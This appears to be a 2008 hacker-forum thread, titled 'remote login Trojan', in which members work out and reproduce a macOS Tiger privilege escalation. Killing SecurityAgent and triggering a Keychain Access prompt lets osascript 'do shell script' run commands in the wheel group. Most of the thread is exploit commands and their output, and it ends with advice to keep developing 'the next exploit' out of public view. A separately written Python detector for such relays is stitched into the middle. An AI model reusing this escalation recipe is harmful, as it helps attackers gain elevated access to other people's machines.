remote login Trojan, Trying to make a program that will select remote login.
callmenames
post Jun 21 2008, 04:00 AM
Post #531





Group: Members
Posts: 1426
Joined: 14-October 05
Member No.: 4296



Still having trouble getting it pinned down but I am able to reproduce it sporadically.

CODE
$ ps -axww | grep Security
5981  ??  S      0:01.27 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent -psn_0_102236161
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)

Then some combination of killing it, running it etc. and....
CODE
ps -axww | grep Security
6198  ??  S      0:01.59 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)


Hmm.
CODE
$ ps -auxww | grep Security
security  6198   0.7  0.4   144740   5896  ??  S     1:53AM   0:01.78 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent

Ok, so at some point it's being launched / relaunched as itself, not as the user... and it appears to not be launched with an argument of a specific psn.

I killed it, after the next two lines...
CODE
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)


Well I can definitely get it to stop being uid=92 :) As for the getting it to be uid=92 that is proving somewhat more elusive.

This post has been edited by callmenames: Jun 21 2008, 04:09 AM
callmenames
post Jun 21 2008, 04:51 AM
Post #532








Okey dokey, try this...
CODE
sudo killall SecurityAgent

The key here is to NOT get it relaunched as your user, so don't try any osascript yet.
Open Keychain Access (it's in /Applications/Utilities)
Select the System keychain
Attempt to unlock it, or attempt to 'show password' for any item within it.
Now go try the osascript command.
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "id"'
uid=92(securityagent) gid=0(wheel) groups=0(wheel)

This appears to be reproducible every time on my PPC/G4 Tiger/10.4.11 system.

Yep, I just restarted and reproduced it on the first try.


This post has been edited by callmenames: Jun 21 2008, 04:54 AM
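
A defensive check for the pattern shown in the post above, added here as an example and not written by any poster in the thread: it scans `ps -axww -o user,pid,command` output for osascript invocations that relay `do shell script` to SecurityAgent or ARDAgent. The sample rows, the watch list and the function names are constructed for illustration.

```python
import re

# Apps named in this thread; the watch list is an assumption to extend per site.
WATCHED_APPS = {"securityagent", "ardagent"}

# ps shows argv after the shell has removed the outer single quotes, so the
# AppleScript text appears bare: tell app "X" to do shell script "..."
TELL_RE = re.compile(
    r'tell\s+app(?:lication)?\s+"(?P<app>[^"]+)"\s+to\s+'
    r'do\s+shell\s+script\s+"(?P<cmd>(?:[^"\\]|\\.)*)"',
    re.IGNORECASE,
)

# Constructed sample of `ps -axww -o user,pid,command` output (not real data).
SAMPLE_PS = """\
USER       PID COMMAND
G4admin   6301 osascript -e tell app "SecurityAgent" to do shell script "id"
G4admin   6310 osascript -e tell application "Finder" to activate
G4admin   6322 /usr/bin/osascript -e tell application "securityagent" to do shell script "id"
security  6198 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent
""".splitlines()


def parse_ps_line(line):
    """Split one ps row into (user, pid, command); None for headers or junk."""
    parts = line.split(None, 2)
    if len(parts) < 3 or not parts[1].isdigit():
        return None
    return parts[0], int(parts[1]), parts[2]


def find_shell_script_relays(ps_lines, watched=WATCHED_APPS):
    """Return osascript processes that relay `do shell script` to a watched app."""
    findings = []
    for line in ps_lines:
        row = parse_ps_line(line)
        if row is None or "osascript" not in row[2]:
            continue
        user, pid, command = row
        for m in TELL_RE.finditer(command):
            if m.group("app").lower() in watched:
                findings.append({"user": user, "pid": pid,
                                 "app": m.group("app"), "cmd": m.group("cmd")})
    return findings


if __name__ == "__main__":
    for hit in find_shell_script_relays(SAMPLE_PS):
        print("ALERT pid=%(pid)d user=%(user)s relays %(cmd)r via %(app)s" % hit)
```

A process listing only catches invocations still running when it is sampled, so the same matcher is better fed from process-execution audit records where those are collected.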
Siph0n
post Jun 21 2008, 04:59 AM
Post #533




Group: Administrators
Posts: 2870
Joined: 14-July 05
From: USA
Member No.: 3694



SecurityAgent is responsible for the authentication prompt I believe, as well as many things accessed by the system from Security.framework. I wonder what its AppleScript dictionary is capable of...

This post has been edited by Siph0n: Jun 21 2008, 05:00 AM


--------------------
QUOTE (callmenames @ Jun 29 2008, 02:49 PM) *
Is a rose bush wrong in its thorny self-adornment? Is fire truly bad when it engulfs mere material in beautiful flame? So it is with Siph0n...


Click: Thar? Yes, right thar.
callmenames
post Jun 21 2008, 05:22 AM
Post #534








As far as I can tell, neither ARDAgent nor SecurityAgent has any AppleScript dictionary of its own. Either the apps are using a shared framework with AppleScript support or they are handing off the AppleScript commands elsewhere...
Siph0n
post Jun 21 2008, 06:28 AM
Post #535






QUOTE(callmenames @ Jun 21 2008, 06:22 AM) *
As far as I can tell, neither ARDAgent nor SecurityAgent has any AppleScript dictionary of its own. Either the apps are using a shared framework with AppleScript support or they are handing off the AppleScript commands elsewhere...

Perhaps some fooling with nm, class-dump and strings is warranted.


callmenames
post Jun 21 2008, 06:50 AM
Post #536








Uh huh, I looked but nothing jumped out at me. All the output is here > http://rapidshare.de/files/39784043/Security.txt.zip.html




This post has been edited by callmenames: Jun 21 2008, 07:08 AM
Siph0n
post Jun 21 2008, 07:22 AM
Post #537






Thanks. Unfortunately nothing jumped out at me either. I'm sure there's some fun tricks hiding in SecurityAgent though. It does more than I initially suspected.


Oktane
post Jun 21 2008, 09:42 AM
Post #538





Group: Members
Posts: 444
Joined: 25-March 08
Member No.: 11914



Yesterday I also noticed while testing all the apps on my computer (10.4.11) that SecurityAgent.app gave a unique output. However I tried using it to make a directory in root and/or the desktop and it always had permissions denied. I think that it carries special permissions set up by the programmers. I'm sure that whoever made that application would realize not to run "SecurityAgent" under anything devastatingly powerful.


--------------------
LET'S TOAST THE RICH... WITH OUR CHOICE OF COCKTAIL!
Macpunk
post Jun 21 2008, 01:40 PM
Post #539





Group: Members
Posts: 748
Joined: 14-July 05
From: Taylor, Texas
Member No.: 3695



QUOTE(callmenames @ Jun 21 2008, 04:51 AM) *
Okey dokey, try this...
CODE
sudo killall SecurityAgent

The key here is to NOT get it relaunched as your user, so don't try any osascript yet.
Open Keychain Access (it's in /Applications/Utilities)
Select the System keychain
Attempt to unlock it, or attempt to 'show password' for any item within it.
Now go try the osascript command.
CODE
osascript -e 'tell app "SecurityAgent" to do shell script "id"'
uid=92(securityagent) gid=0(wheel) groups=0(wheel)

This appears to be reproducible every time on my PPC/G4 Tiger/10.4.11 system.

Yep, I just restarted and reproduced it on the first try.


Reproducible for me too. PPC/G4/10.4.111.

I was thinking about this last night and was gonna try this theory last night. xD

I'm thinking all you need is a prompt that asks for higher permissions. If that's true, then it ought to work with any application (as was demonstrated through Keychain Access).

--Macpunk


Oktane
post Jun 21 2008, 03:19 PM
Post #540








As we draw closer to the next exploit how about we keep it on the down low, PM, IRC or a thread that's a little less HOT. Just a suggestion.

